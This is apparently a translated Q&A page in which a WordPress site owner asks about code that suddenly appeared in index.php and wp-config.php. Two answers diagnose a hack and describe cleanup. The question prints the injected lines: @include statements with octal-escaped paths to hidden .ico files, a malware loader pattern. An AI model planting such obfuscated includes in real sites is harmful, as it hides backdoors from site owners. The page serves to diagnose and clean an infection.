外来代码出现在wordpress安装关键文件中

时间:2019-06-23 08:57:11

标签: php html wordpress security

从4天前到现在,我的网站中已自动生成了一些代码,这些代码以wordpress作为CMS运行。

index.php文件中生成的代码是这样的:

/*12a36*/

@include "\057home\057ippl\145ir/p\165blic\137html\057blog\057wp-i\156clud\145s/ce\162tifi\143ates\057.3b4\141428f\056ico";

/*12a36*/

wp-config文件中生成的代码为:

/*e2db6*/

@include "\057h\157m\145/\151p\160l\145i\162/\160u\142l\151c\137h\164m\154/\167p\055i\156c\154u\144e\163/\122e\161u\145s\164s\057R\145s\160o\156s\145/\0563\1455\065f\070d\062.\151c\157";

/*e2db6*/

该网站报告404错误。 我需要如何解决此问题的建议/帮助。

当在文件index.phpwp-config中生成此代码时,我的服务器会自动删除index.php文件。

此外,我还使用i-theme安全插件。

2 个答案:

答案 0 :(得分:0)

这只是表明您的网站可能已被一些被低估或过时的插件黑客入侵,您必须手动清理网站并更新插件和WordPress核心。

您可以使用在线扫描站点来确保受到攻击[https://sitecheck.sucuri.net/],也可能有一个外来的[php]文件将充当后门,请手动验证文件。

答案 1 :(得分:0)

您的网站可能已被恶意软件/病毒入侵/入侵。

代码指向要包含的路径:

/home/ippleir/public_html/blog/wp-includes/certificates/.3b4a428f.ico

您应该清除同一服务器上存在的所有安装。

首先删除包含的文件/目录,然后您可以按照网络上的许多说明或我的here on SO的旧答案